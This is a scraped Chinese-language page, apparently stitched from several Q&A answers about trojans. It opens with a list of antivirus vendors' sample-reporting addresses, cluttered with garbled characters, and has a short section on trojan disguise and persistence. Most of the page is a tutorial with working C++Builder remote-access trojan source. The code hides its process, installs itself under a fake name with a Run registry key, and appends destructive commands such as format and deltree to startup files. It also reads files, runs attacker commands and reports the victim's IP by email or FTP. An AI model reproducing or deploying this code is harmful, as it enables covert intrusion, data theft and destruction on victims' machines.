登錄界面上傳木馬教程

① 誰知道怎麼上傳報告木馬程序啊!!

在各個殺軟網站上都有上報郵件地址哦。
可疑程式檔案上報地址]國家計算機病毒應急處理中心及反病毒軟體廠家
國家計算機病毒應急處理中心 c uAp
,!
計算機病毒防治產品檢驗中心 A ?~4Pe
網 址：http://www.antivirus-China.org.cn e6jdSn
電 話：022-66211488/66211489/66211490 W^:g_
傳 真：022-66211155 ;' 'S} ;
電子郵件：[email protected] /xA`VyH
O
通信地址：天津市經濟技術開發區第四大街80號天大科技園C6 MhFj>t 
郵政編碼：300457 QmPHf*w[
y3V47J2o
1) 金山病毒上報郵箱： http://db.kingsoft.com/virus/viruspost/index.shtml {K= [Fu=
/z,+W9`
2) 反黑精英病毒上報郵箱： [email protected] GZFL Ju
2ld0w=?+eu
3) 趨勢病毒上報郵箱： [email protected] &]'< M
所有樣本需要統一進行壓縮加密處理，壓縮格式必須為「.zip」，密碼統一為小寫」a」。 h<2O+"^
!;C *Wsp}
4) 卡巴斯基病毒上報信箱: [email protected] s%qK<U4@;Q
請將病毒樣本壓縮,並用 「virus」 作壓縮口令 d~J4&w
3~!PJI1
5) 瑞星病毒上報信箱是： http://up.rising.com.cn/webmail/uploadnew.htm S}*%l)vfR
Q:B
:
6) 江民科技病毒上報信箱是： [email protected] fOyLBixR
+H L]t'UEg
7) 木馬剋星病毒上報信箱是: [email protected] 6!n%S Ut
A %s"WSx,
8) NOD32病毒上報郵箱： [email protected] G =+sW
,wlh0;,
9) 費爾托斯特病毒上報郵箱： [email protected] bd2"k;H<o
:R<n{%~
10) 木馬清除大師病毒上報郵箱： [email protected] [email protected] jv]:`$}G\
c]W]m`:
11) AV95病毒上報郵箱： [email protected] B" wk:\zC
h2u> CXD
12) 諾頓病毒上報郵箱： [email protected] J%;TK6
Mx-,:a9}
13) 熊貓衛士病毒上報郵箱： [email protected] lB L;aTzo
>ea<6&!Ee
14) KILL病毒上報郵箱： [email protected] #Qy*zU#9
v/Z}|dT"
15) vrv病毒上報郵箱： [email protected] W9Bl'e
2 ,;+)
16) McAfee病毒上報郵箱： [email protected] Y 1Bj++?2
x"v5'EpL
17) 東方衛士病毒上報郵箱： [email protected] <2ffcBv
/^#k /z
18) AntiVir病毒上報郵箱： [email protected] pt(GpbtWK
Q9 kKk
19) 藍銳病毒上報郵箱： [email protected] -d %bc?
?Hf^& yo
20) bulland病毒上報郵箱： [email protected]  ~ceGx
`\q4z-<-
21) proct病毒上報郵箱： [email protected] ?O\n!
c
HG=!#-$9
22) FRISK病毒上報郵箱： [email protected] uMP
J
;r^8In@6
23) avast病毒上報郵箱： [email protected] e0j*e7$
UG&/0{j5XV
24) Virus病毒上報郵箱： [email protected] K$ #(\-M
,U]
,Wu)
25) 密碼防盜專家病毒上報郵箱： [email protected] =6ZZ/+6b
%:N5k+}
26) anti病毒上報郵箱： [email protected] &=<x&4H+
tL 3]9qfj
27) F-Secure病毒上報郵箱： [email protected] &P&M6v+
< :<E~anH
28) 木馬獵手病毒上報郵箱： [email protected] CS:j->
BCJo/m
29) The Cleaner病毒上報郵箱： [email protected] ,gUSW
?y>P
30) Trojan Remover病毒上報郵箱：[email protected] 5qt]~v%y
z4HIDb
31) ZoneAlarm病毒上報郵箱： [email protected] 4`I2tr
aqQ YU5l4~
32) MEFEE病毒上報郵箱： [email protected] + 0{m(
%i
6}6;%{p"Gu
33) HackTracer病毒上報郵箱： [email protected] k@L},Td
AyKvh
34) Spytech NetArmor病毒上報郵箱：wangqiang88@ )_k"_VVcC
4wjy)VD_
35) LockDown病毒上報郵箱： [email protected] H
.*:+
#5)0~4%l
36) 盜號統殺病毒上報郵箱： [email protected] 2l]*><q|
+`tl<r g;
37) 捉鬼隊病毒上報郵箱： [email protected] ;;e\"%}@=q
=1Nz*
c
38) TrojanHunter病毒上報郵箱： [email protected] v: \8
H<_BnT #
39) 天網病毒上報郵箱： [email protected] ]oT8H?%*Y
Nq]8p =e
40) 木馬分析專家病毒上報郵箱： [email protected] TF]bmM})0
%MG{KG=&o
41) SpyStopper病毒上報郵箱： [email protected] @JW HG1qJ
vCvjb\S
42) Trojan Guarder病毒上報郵箱： [email protected] FOPfo b[
1JQ5bB"
43) Digital Patrol病毒上報郵箱： [email protected] 3Pu8IXW
w"`Zf7a{/
44) Tiny Personal病毒上報郵箱： [email protected] @4t_cxmD
i:a*6b.U@N
45) Adware Away病毒上報郵箱： [email protected] N \~}`({
Ucx"\/"
46) SpyCatcher病毒上報郵箱： [email protected] Ku RJo]
)x,/+R]{8l
47) pcSuper病毒上報郵箱： [email protected] hgj ]Jr
2 \<u;9
48) 木馬天敵病毒上報郵箱： [email protected] P BVF'~f@j
4@+
']vN4
49) 安鐵諾安全專家病毒上報郵箱： [email protected] ~,_@|,)
Hd\. ,2a"
50) 安博士病毒上報郵箱： [email protected] cyLl,OA
]h#QA; 
51)木馬殺客上報病毒樣本郵箱 : [email protected]

② lol登陸界面提示中木馬怎麼辦

英雄聯盟登陸頁面提示有木馬時；
關閉客戶端，重新開啟客戶端即可；
英雄聯盟的檢測系統，只會檢測電腦後台程序；
因此盡量在運行英雄聯盟前，關閉所有後台程序；
並且腳本程序很容易被檢測為木馬程序。

③ 簡述木馬攻擊的步驟。

抓你系統或軟體漏洞入你電腦，偷讀你信息，發給別人。

1. 配置木馬
一般來說一個設計成熟的木馬都有木馬配置程序，從具體的配置內容看，主要是為了實現以下兩方面功能：
（1）木馬偽裝：木馬配置程序為了在服務端盡可能好的隱藏木馬，會採用多種偽裝手段，如修改圖標、捆綁文件、定製埠、自我銷毀等等。
（2）信息反饋：木馬配置程序將就信息反饋的方式或地址進行設置，如設置信息反饋的郵件地址、IRC號、ICQ號等。
2. 傳播木馬
（1）傳播方式
木馬的傳播方式主要有兩種：一種是通過E-MAIL，控制端將木馬程序以附件的形式夾在郵件中發送出去，收信人只要打開附件系統就會感染木馬；另一種是軟體下載，一些非正規的網站以提供軟體下載為名義，將木馬捆綁在軟體安裝程序上，下載後，只要一運行這些程序，木馬就會自動安裝。
（2）偽裝方式
鑒於木馬的危害性，很多人對木馬知識還是有一定了解的，這對木馬的傳播起了一定的抑製作用，這是木馬設計者所不願見到的。因此他們開發了多種功能來偽裝木馬，以達到降低用戶警覺，欺騙用戶的目的。一般來說有以下幾種：
①.修改圖標
也許你會在E-MAIL的附件中看到一個很平常的文本圖標，但是我不得不告訴你，這也有可能是個木馬程序，現在已經有木馬可以將木馬服務端程序的圖標改成HTML、TXT、ZIP等各種文件的圖標，這有相當大的迷惑性，但是目前提供這種功能的木馬還不多見，並且這種偽裝也不是無懈可擊的，所以不必整天提心吊膽、疑神疑鬼的。
②.捆綁文件
這種偽裝手段是將木馬捆綁到一個安裝程序上，當安裝程序運行時，木馬在用戶毫無察覺的情況下，偷偷的進入了系統。至於被捆綁的文件一般是可執行文件，即EXE、COM一類的文件。
③.出錯顯示
有一定木馬知識的人都知道，如果打開一個文件，沒有任何反應，這很可能就是個木馬程序，木馬的設計者也意識到了這個缺陷，所以已經有木馬提供了一個叫做出錯顯示的功能。當服務端用戶打開木馬程序時，會彈出一個錯誤提示框——這當然是假的，錯誤內容可自由定義，大多會定製成一些諸如「文件已破壞，無法打開的！」之類的信息，當服務端用戶信以為真時，木馬卻悄悄侵入了系統。
④.定製埠
很多老式的木馬埠都是固定的，這給判斷是否感染了木馬帶來了方便，只要查一下特定的埠就知道感染了什麼木馬，所以現在很多新式的木馬都加入了定製埠的功能，控制端用戶可以在1024——65535之間任選一個埠作為木馬埠。一般不選1024以下的埠，這樣就給判斷所感染木馬類型帶來了麻煩。
⑤.自我銷毀
這項功能是為了彌補木馬的一個缺陷。我們知道當服務端用戶打開含有木馬的文件後，木馬會將自己拷貝到WINDOWS的系統文件的C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下，一般來說原木馬文件和系統文件夾中的木馬文件的大小是一樣的，捆綁文件的木馬除外。那麼中了木馬的朋友只要在近來收到的信件和下載的軟體中找到原木馬文件，然後根據原木馬的大小去系統文件夾找相同大小的文件， 判斷一下哪個是木馬就行了。而木馬的自我銷毀功能是指安裝完木馬後，原木馬文件將自動銷毀，這樣服務端用戶就很難找到木馬的來源，在沒有查殺木馬的工具幫助下，就很難刪除木馬了。
⑥.木馬更名
安裝到系統文件夾中的木馬的文件名一般是固定的，那麼只要根據一些查殺木馬的文章，按圖索驥在系統文件夾查找特定的文件，就可以斷定中了什麼木馬。所以現在有很多木馬都允許控 制端用戶自由定製安裝後的木馬文件名，這樣很難判斷所感染的木馬類型了。

3．運行木馬
服務端用戶運行木馬或捆綁木馬的程序後，木馬就會自動進行安裝。首先將自身拷貝到WINDOWS的系統文件夾中C:\WINDOWS或C:\WINDOWS\SYSTEM目錄下。然後在注冊表、啟動組、非啟動組中設置好木馬的觸發條件，這樣木馬的安裝就完成了。安裝後就可以啟動木馬了。
由觸發條件激活木馬
觸發條件是指啟動木馬的條件，大致出現在下面八個地方：
①注冊表
打開HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\下的五個以Run和RunServices主鍵，在其中尋找可能是啟動木馬的鍵值。
②WIN.INI
C:\WINDOWS目錄下有一個配置文件win.ini，用文本方式打開，在windows欄位中有啟動命令load=和run=，在一般情況下是空白的，如果有啟動程序，可能是木馬。
③SYSTEM.INI
C:\WINDOWS目錄下有個配置文件system.ini，用文本方式打開，在386Enh、mic、drivers32中有命令行，在其中尋找木馬的啟動命令。
④Autoexec.bat和Config.sys
在C盤根目錄下的這兩個文件也可以啟動木馬。但這種載入方式一般都需要控制端用戶與服務端建立連接後，將已添加木馬啟動命令的同名文件上傳到服務端覆蓋這兩個文件才行。
⑤*.INI
即應用程序的啟動配置文件，控制端利用這些文件能啟動程序的特點，將製作好的帶有木馬啟動命令的同名文件上傳到服務端覆蓋這同名文件，這樣就可以達到啟動木馬的目的了。
⑥注冊表
打開HKEY_CLASSES_ROOT\文件類型\shell\open\command主鍵，查看其鍵值。舉個例子，國產木馬「冰河」就是修改HKEY_CLASSES_ROOT\txtfile\shell\open\command下的鍵值，將「C:\WINDOWS \NOTEPAD.EXE ％1」改為「C:\WINDOWS\SYSTEM\SYSEXPLR.EXE ％1」，這時你雙擊一個TXT文件後，原本應用NOTEPAD打開文件的，現在卻變成啟動木馬程序了。還要說明的是不光是TXT文件，通過修改HTML、EXE、ZIP等文件的啟動命令的鍵值都可以啟動木馬，不同之處只在於「文件類型」這個主鍵的差別，TXT是txtfile，ZIP是WINZIP，大家可以試著去找一下。
⑦捆綁文件
實現這種觸發條件首先要控制端和服務端通過木馬建立連接，然後控制端用戶用工具軟體將木馬文件和某一應用程序捆綁在一起，然後上傳到服務端覆蓋原文件，這樣即使木馬被刪除了，只要運行捆綁了木馬的應用程序，木馬又會被安裝上去了。
⑧啟動菜單
在「開始—程序—啟動」選項下也可能有木馬的觸發條件。

④ 如何編寫木馬

木馬是如何編寫的（一）

特洛依木馬這個名詞大家應該不陌生，自從98年「死牛崇拜」黑客小組公布Back Orifice以來，木馬猶如平地上的驚雷，使在Dos??Windows時代中長大的中國網民從五彩繽紛的網路之夢中驚醒，終於認識到的網路也有它邪惡的一面，一時間人心惶惶。
我那時在《電腦報》上看到一篇文章，大意是一個菜鳥被人用BO控制了，嚇得整天吃不下飯、睡不著覺、上不了網，到處求救！呵呵，要知道，木馬（Trojan）的歷史是很悠久的：早在AT&T Unix和BSD Unix十分盛行的年代，木馬是由一些玩程式（主要是C）水平很高的年輕人（主要是老美）用C或Shell語言編寫的，基本是用來竊取登陸主機的口令，以取得更高的許可權。那時木馬的主要方法是誘騙??先修改你的.profile文件，植入木馬；當你登陸時將你敲入的口令字元存入一個文件，用Email的形式發到攻擊者的郵箱里。國內的年輕人大都是在盜版Dos的熏陶下長大的，對網路可以說很陌生。直到Win9x橫空出世，尤其是WinNt的普及，大大推動了網路事業的發展的時候，BO這個用三年後的眼光看起來有點簡單甚至可以說是簡陋的木馬（甚至在Win9x的「關閉程序」對話框可以看到進程）給了當時中國人極大的震撼，它在中國的網路安全方面可以說是一個劃時代的軟體。
自己編寫木馬，聽起來很Cool是不是？！木馬一定是由兩部分組成??伺服器程序（Server）和客戶端程序（Client），伺服器負責打開攻擊的道路，就像一個內奸特務；客戶端負責攻擊目標，兩者需要一定的網路協議來進行通訊（一般是TCP/IP協議）。為了讓大家更好的了解木馬攻擊技術，破除木馬的神秘感，我就來粗略講一講編寫木馬的技術並順便編寫一個例子木馬，使大家能更好地防範和查殺各種已知和未知的木馬。
首先是編程工具的選擇。目前流行的開發工具有C++Builder、VC、VB和Delphi，這里我們選用C++Builder（以下簡稱BCB）；VC雖然好，但GUI設計太復雜，為了更好地突出我的例子，集中注意力在木馬的基本原理上，我們選用可視化的BCB；Delphi也不錯，但缺陷是不能繼承已有的資源（如「死牛崇拜」黑客小組公布的BO2000源代碼，是VC編寫的，網上俯拾皆是）；VB嘛，談都不談??難道你還給受害者傳一個1兆多的動態鏈接庫??Msvbvm60.dll嗎？
啟動C++Builder 5.0企業版，新建一個工程，添加三個VCL控制項：一個是Internet頁中的Server Socket，另兩個是Fastnet頁中的NMFTP和NMSMTP。Server Socket的功能是用來使本程序變成一個伺服器程序，可以對外服務（對攻擊者敞開大門）。Socket最初是在Unix上出現的，後來微軟將它引入了Windows中（包括Win98和WinNt）；後兩個控制項的作用是用來使程序具有FTP（File Transfer Protocol文件傳輸協議）和SMTP（Simple Mail Transfer Protocol簡單郵件傳輸協議）功能，大家一看都知道是使軟體具有上傳下載功能和發郵件功能的控制項。
Form窗體是可視的，這當然是不可思議的。不光佔去了大量的空間（光一個Form就有300K之大），而且使軟體可見，根本沒什麼作用。因此實際寫木馬時可以用一些技巧使程序不包含Form，就像Delphi用過程實現的小程序一般只有17K左右那樣。
我們首先應該讓我們的程序能夠隱身。雙擊Form，首先在FormCreate事件中添加可使木馬在Win9x的「關閉程序」對話框中隱藏的代碼。這看起來很神秘，其實說穿了不過是一種被稱之為Service的後台進程,它可以運行在較高的優先順序下,可以說是非常靠近系統核心的設備驅動程序中的那一種。因此，只要將我們的程序在進程資料庫中用RegisterServiceProcess()函數注冊成服務進程（Service Process）就可以了。不過該函數的聲明在Borland預先打包的頭文件中沒有，那麼我們只好自己來聲明這個位於KERNEL32.DLL中的鳥函數了。
首先判斷目標機的操作系統是Win9x還是WinNt：
{
DWORD dwVersion = GetVersion();
// 得到操作系統的版本號
if (dwVersion >= 0x80000000)
// 操作系統是Win9x，不是WinNt
{
typedef DWORD (CALLBACK* LPREGISTERSERVICEPROCESS)(DWORD,DWORD);
file://定義RegisterServiceProcess()函數的原型
HINSTANCE hDLL;
LPREGISTERSERVICEPROCESS lpRegisterServiceProcess;
hDLL = LoadLibrary("KERNEL32");
file://載入RegisterServiceProcess()函數所在的動態鏈接庫KERNEL32.DLL
lpRegisterServiceProcess = (LPREGISTERSERVICEPROCESS)GetProcAddress(hDLL,"RegisterServiceProcess");
file://得到RegisterServiceProcess()函數的地址
lpRegisterServiceProcess(GetCurrentProcessId(),1);
file://執行RegisterServiceProcess()函數,隱藏本進程
FreeLibrary(hDLL);
file://卸載動態鏈接庫
}
}
這樣就終於可以隱身了（害我敲了這么多代碼！）。為什麼要判斷操作系統呢？因為WinNt中的進程管理器可以對當前進程一覽無余，因此沒必要在WinNt下也使用以上代碼（不過你可以使用其他的方法，這個留到後面再講）。接著再將自己拷貝一份到%System%目錄下，例如：C:\Windows\System，並修改注冊表，以便啟動時自動載入：
{
char TempPath[MAX_PATH];
file://定義一個變數
GetSystemDirectory(TempPath ,MAX_PATH);
file://TempPath是system目錄緩沖區的地址,MAX_PATH是緩沖區的大小，得到目標機的System目錄路徑
SystemPath=AnsiString(TempPath);
file://格式化TempPath字元串，使之成為能供編譯器使用的樣式
CopyFile(ParamStr(0).c_str(), AnsiString(SystemPath+"\\Tapi32.exe").c_str() ,FALSE);
file://將自己拷貝到%System%目錄下，並改名為Tapi32.exe，偽裝起來
Registry=new TRegistry;
file://定義一個TRegistry對象，准備修改注冊表，這一步必不可少
Registry->RootKey=HKEY_LOCAL_MACHINE;
file://設置主鍵為HKEY_LOCAL_MACHINE
Registry->OpenKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run",TRUE);
file://打開鍵值Software\\Microsoft\\Windows\\CurrentVersion\\Run，如果不存在，就創建之
try
{
file://如果以下語句發生異常，跳至catch，以避免程序崩潰
if(Registry->ReadString("crossbow")!=SystemPath+"\\Tapi32.exe")
Registry->WriteString("crossbow",SystemPath+"\\Tapi32.exe");
file://查找是否有「crossbow」字樣的鍵值，並且是否為拷貝的目錄%System%+Tapi32.exe
file://如果不是，就寫入以上鍵值和內容
}
catch(...)
{
file://如果有錯誤，什麼也不做
}
}

好，FormCreate過程完成了，這樣每次啟動都可以自動載入Tapi32.exe，並且在「關閉程序」對話框中看不見本進程了，木馬的雛形初現。
接著選中ServerSocket控制項，在左邊的Object Inspector中將Active改為true，這樣程序一啟動就打開特定埠，處於伺服器工作狀態。再將Port填入4444，這是木馬的埠號，當然你也可以用別的。但是你要注意不要用1024以下的低端埠，因為這樣不但可能會與基本網路協議使用的埠相沖突，而且很容易被發覺，因此盡量使用1024以上的高端埠（不過也有這樣一種技術，它故意使用特定埠，因為如果引起沖突，Windows也不會報錯 ^_^）。你可以看一看TNMFTP控制項使用的埠，是21號埠，這是FTP協議的專用控制埠（FTP Control Port）；同理TNMSMTP的25號埠也是SMTP協議的專用埠。
再選中ServerSocket控制項，點擊Events頁，雙擊OnClientRead事件，敲入以下代碼：
{
FILE *fp=NULL;
char * content;
int times_of_try;
char TempFile[MAX_PATH];
file://定義了一堆待會兒要用到的變數
sprintf(TempFile, "%s", AnsiString(SystemPath+AnsiString("\\Win369.BAT")).c_str());
file://在%System%下建立一個文本文件Win369.bat，作為臨時文件使用
AnsiString temp=Socket->ReceiveText();
file://接收客戶端（攻擊者，也就是你自己）傳來的數據
}
好，大門敞開了！接著就是修改目標機的各種配置了！^_^ 首先我們來修改Autoexec.bat和Config.sys吧：
{
if(temp.SubString(0,9)=="edit conf")
file://如果接受到的字元串的前9個字元是「edit conf」
{
int number=temp.Length();
file://得到字元串的長度
int file_name=atoi((temp.SubString(11,1)).c_str());
file://將第11個字元轉換成integer型，存入file_name變數
file://為什麼要取第11個字元，因為第10個字元是空格字元
content=(temp.SubString(12,number-11)+'\n').c_str();
file://餘下的字元串將被作為寫入的內容寫入目標文件
FILE *fp=NULL;
char filename[20];
chmod("c:\\autoexec.bat",S_IREADS_IWRITE);
chmod("c:\\config.sys",S_IREADS_IWRITE);
file://將兩個目標文件的屬性改為可讀可寫
if(file_name==1)
sprintf(filename,"%s","c:\\autoexec.bat");
file://如果第11個字元是1,就把Autoexec.bat格式化
else if(file_name==2)
sprintf(filename,"%s","c:\\config.sys");
file://如果第11個字元是1,就把Config.sys格式化
times_of_try=0;
file://定義計數器
while(fp==NULL)
{
file://如果指針是空
fp=fopen(filename,"a+");
file://如果文件不存在，創建之；如果存在，准備在其後添加
file://如果出錯，文件指針為空，這樣就會重復
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://跳至END處
}
}
fwrite(content,sizeof(char),strlen(content),fp);
file://寫入添加的語句，例如deltree/y C:或者format/q/autotest C:，夠毒吧？！
fclose(fp);
file://寫完後關閉目標文件
Socket->SendText("Sucess");
file://然後發回「Success」的成功信息
}
}

上回我們講到如何修改目標機上的啟動配置文件，這回我們就來查看目標機上的目錄樹和文件吧，這在客戶端上使用「dir」命令，跟著敲?：
{
else if(temp.SubString(0,3)=="dir")
{
file://如果前3個字元是「dir」
int Read_Num;
char * CR_LF="\n";
int attrib;
char *filename;
DIR *dir;
struct dirent *ent;
int number=temp.Length();
file://得到字元串的長度
AnsiString Dir_Name=temp.SubString(5,number-3);
file://從字元串第六個字元開始，將後面的字元存入Dir_Name變數，這是目錄名
if(Dir_Name=="")
{
file://如果目錄名為空
Socket->SendText("Fail By Open DIR's Name");
file://返回「Fail By Open DIR's Name」信息
goto END;
file://跳到END
}
char * dirname;
dirname=Dir_Name.c_str();
if ((dir = opendir(dirname)) == NULL)
{
file://如果打開目錄出錯
Socket->SendText("Fail by your DIR's name!");
file://返回「Fail By Your DIR's Name」信息
goto END;
file://跳到END
}
times_of_try=0;
while(fp==NULL)
{
file://如果指針是NULL
fp=fopen(TempFile,"w+");
file://就創建system\Win369.bat准備讀和寫；如果此文件已存在，則會被覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功（真有耐心！）
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
while ((ent = readdir(dir)) != NULL)
{
file://如果訪問目標目錄成功
if(*(AnsiString(dirname)).AnsiLastChar()!='\\')
file://如果最後一個字元不是「\」，證明不是根目錄
filename=(AnsiString(dirname)+"\\"+ent->d_name).c_str();
file://加上「\」字元後將指針指向目錄流
else
filename=(AnsiString(dirname)+ent->d_name).c_str();
file://如果是根目錄，則不用加「\」
attrib=_rtl_chmod(filename, 0);
file://得到目標文件的訪問屬性
if (attrib & FA_RDONLY)
file://「&」字元是比較前後兩個變數，如果相同返回1,否則返回0
fwrite(" R",sizeof(char),3,fp);
file://將目標文件屬性設為只讀
else
fwrite(" ",sizeof(char),3,fp);
file://失敗則寫入空格
if (attrib & FA_HIDDEN)
fwrite("H",sizeof(char),1,fp);
file://將目標文件屬性設為隱藏
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_SYSTEM)
fwrite("S",sizeof(char),1,fp);
file://將目標文件屬性設為系統
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_ARCH)
fwrite("A",sizeof(char),1,fp);
file://將目標文件屬性設為普通
else
fwrite(" ",sizeof(char),1,fp);
file://失敗則寫入空格
if (attrib & FA_DIREC)
fwrite(" <DIR> ",sizeof(char),9,fp);
file://將目標文件屬性設為目錄
else
fwrite(" ",sizeof(char),9,fp);
file://失敗則寫入空格
fwrite(ent->d_name,sizeof(char),strlen(ent->d_name),fp);
file://將目錄名寫入目標文件
fwrite(CR_LF,1,1,fp);
file://寫入換行
}
fclose(fp);
file://關閉文件
closedir(dir);
file://關閉目錄
FILE *fp1=NULL;
times_of_try=0;
while(fp1==NULL)
{
fp1=fopen(TempFile,"r");
file://打開Win369.bat准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已經試了100次了，仍未成功
Socket->SendText("Fail By Open File");
file://就發回「Fail By Open File」的錯誤信息
goto END;
file://並跳到END處
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義的一個空數組
Read_Num=fread(temp_content,1,300,fp1);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp1);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text變數加上剛才的300個字元
fclose(fp1);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text變數的內容
}
}
夠長吧？！察看目錄樹這么費勁啊？！你後面可以用BCB中的各種列表框對Client.exe好好美化美化。接下來就是查看指定文件的內容了，Client將使用「type」命令，（手指累不累啊？）：
{
else if(temp.SubString(0,4)=="type")
{
file://如果前4個字元是「type」
int Read_Num;
int number=temp.Length();
AnsiString File_Name=temp.SubString(6,number-4);
file://將目標文件流存入File_Name變數中
times_of_try=0;
while(fp==NULL)
{
fp=fopen(File_Name.c_str(),"r");
file://打開目標文件准備讀
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
file://如果已試了100次了
Socket->SendText("Fail By Open File");
file://返回「Fail By Open File」的錯誤信息
goto END;
file://跳到END
}
}
AnsiString Return_Text="";
char temp_content[300];
for(int i=0;i<300;i++) temp_content[i]='\0';
file://定義一個空數組
Read_Num=fread(temp_content,1,300,fp);
file://從目標文件中讀入前300個字元
while(Read_Num==300)
{
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
for(int i=0;i<300;i++) temp_content[i]='\0';
Read_Num=fread(temp_content,1,300,fp);
file://重復
};
Return_Text=Return_Text+temp_content;
file://Return_Text的內容加上剛才的字元
fclose(fp);
file://關閉目標文件
Socket->SendText(Return_Text);
file://返回Return_Text的內容，即你查看文件的內容
}
}
咳咳！累死了！還是來點輕松的吧??操縱目標機的光碟機（注意：mciSendString()函數的聲明在mmsystem.h頭文件中）：
{
else if(temp=="open")
{
file://如果收到的temp的內容是「open」
mciSendString("set cdaudio door open", NULL, 0, NULL);
file://就彈出光碟機的托盤
}
else if(temp=="close")
{
file://如果收到的temp的內容是「close」
mciSendString("Set cdaudio door closed wait", NULL, 0, NULL);
file://就收入光碟機的托盤。當然你也可以搞個死循環，讓他的光碟機好好活動活動！^_^
}
}
接著就是交換目標機的滑鼠左右鍵，代碼如下：
{
else if(temp=="swap")
{
SwapMouseButton(1);
file://交換滑鼠左右鍵，簡單吧？
}
}
然後就是使目標機重新啟動。但這里要區分WinNt和Win9x??NT非常注重系統每個進程的權利，一個普通的進程是不應具備有調用系統的權利的，因此我們要賦予本程序足夠的許可權：
{
else if(temp=="reboot")
{
file://如果收到的temp的內容是「temp」
DWORD dwVersion = GetVersion();
file://得到操作系統的版本號
if (dwVersion < 0x80000000)
{
file://操作系統是WinNt，不是Win9x
HANDLE hToken;
TOKEN_PRIVILEGES tkp;
file://定義變數
OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES TOKEN_QUERY, &hToken);
file://OpenProcessToken()這個函數的作用是打開一個進程的訪問令牌
file://GetCurrentProcess()函數的作用是得到本進程的句柄
LookupPrivilegeValue(NULL, SE_SHUTDOWN_NAME,&tkp.Privileges[0].Luid);
file://LookupPrivilegeValue()的作用是修改進程的許可權
tkp.PrivilegeCount = 1;
file://賦給本進程特權
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken, FALSE, &tkp, 0,(PTOKEN_PRIVILEGES)NULL, 0);
file://AdjustTokenPrivileges()的作用是通知Windows NT修改本進程的權利
ExitWindowsEx(EWX_REBOOT EWX_FORCE, 0);
file://強行退出WinNt並重啟
}
else ExitWindowsEx(EWX_FORCE+EWX_REBOOT,0);
file://強行退出Win9x並重啟
}
}
如果以上都不是，就讓它在Dos窗口中執行傳來的命令：
{
else
{
file://如果都不是
char * CR_TF="\n";
times_of_try=0;
while(fp==NULL)
{
fp=fopen(TempFile,"w+");
file://創建Win369.bat，如果已存在就覆蓋
times_of_try=times_of_try+1;
file://計數器加1
if(times_of_try>100)
{
Socket->SendText("Fail By Open File");
file://返回「Fail By Open File」的信息
goto END;
file://跳到END
}
}
fwrite(temp.c_str(),sizeof(char),strlen(temp.c_str()),fp);
file://寫入欲執行的命令
fwrite(CR_TF,sizeof(char),strlen(CR_TF),fp);
file://寫入換行符
fclose(fp);
file://關閉Win369.bat
system(TempFile);
file://執行Win369.bat
Socket->SendText("Success");
file://返回「Success」信息
}
}
你可以直接執行什麼Ping和Tracert之類的命令來進一步刺探目標機的網路狀況（判斷是否是一個企業的區域網），然後可以進一步攻擊，比如Deltree和Format命令。^_^

到此，伺服器程序的功能已全部完成，但還差容錯部分未完成,這樣才能避免程序因意外而崩潰。朋友，別走開！（未完待續）
木馬是如何編寫的（三）
武漢 周侃
上次已編寫完伺服器端的各種功能，但還差容錯部分還未完成,下面我們Go on! 其代碼如下（照敲不誤 ^_^）：
{
END:;
Socket->Close();
file://關閉服務
ServerSocket1->Active =true;
file://再次打開服務
if (NMSMTP1->Connected) NMSMTP1->Disconnect();
file://如果SMTP伺服器已連接則斷開
NMSMTP1->Host = "smtp.163.net";
file://選一個好用的SMTP伺服器，如163、263、sina和btamail
NMSMTP1->UserID = "";
file://你SMTP的ID
try
{
NMSMTP1->Connect();
file://再次連接
}
catch(...)
{
goto NextTime;
file://跳到NextTime
}
NMSMTP1->PostMessage->FromAddress ="I don't know!";
file://受害者的Email地址
NMSMTP1->PostMessage->FromName = "Casualty";
file://受害者的名字
NMSMTP1->PostMessage->ToAddress->Text = "[email protected]";
file://將信發到我的郵箱，這一步很關鍵
NMSMTP1->PostMessage->Body->Text = AnsiString("Server Running on:") + NMSMTP1->LocalIP ;
file://信的內容提示你「伺服器正在運行」，並且告訴你受害者的目前的IP地址，以便連接
NMSMTP1->PostMessage->Subject = "Server Running Now!";
file://信的主題
NMSMTP1->SendMail();
file://發送！
return;
file://返回
NextTime:
NMFTP1->Host = "ftp.go.163.com";
file://你的FTP伺服器的地址
NMFTP1->UserID = "";
file://你的用戶ID
NMFTP1->Port = 21;
file://FTP埠號，一般為21
NMFTP1->Password = "";
file://你的FTP的密碼
if(NMFTP1->Connected) NMFTP1->Disconnect();
file://如果已連接就斷開
try
{
NMFTP1->Connect();
file://再連接
}
catch(...)
{
return;
file://返回
}
AnsiString SendToSite = "Server Running on: " + NMFTP1->RemoteIP;
file://受害者的IP地址
FILE * Upload;
Upload = fopen(NMFTP1->RemoteIP.c_str(),"w+");
file://創建一個新文件准備寫，如果已存在就覆蓋
fwrite(SendToSite.c_str(),sizeof(char),SendToSite.Length(),Upload);
file://寫入以上的SendToSite的內容
fclose(Upload);
file://寫完後關閉此文件
NMFTP1->RemoveDir("public_html");
file://刪除public_html目錄
NMFTP1->Upload(NMFTP1->RemoteIP, NMFTP1->RemoteIP);
file://上傳！
}
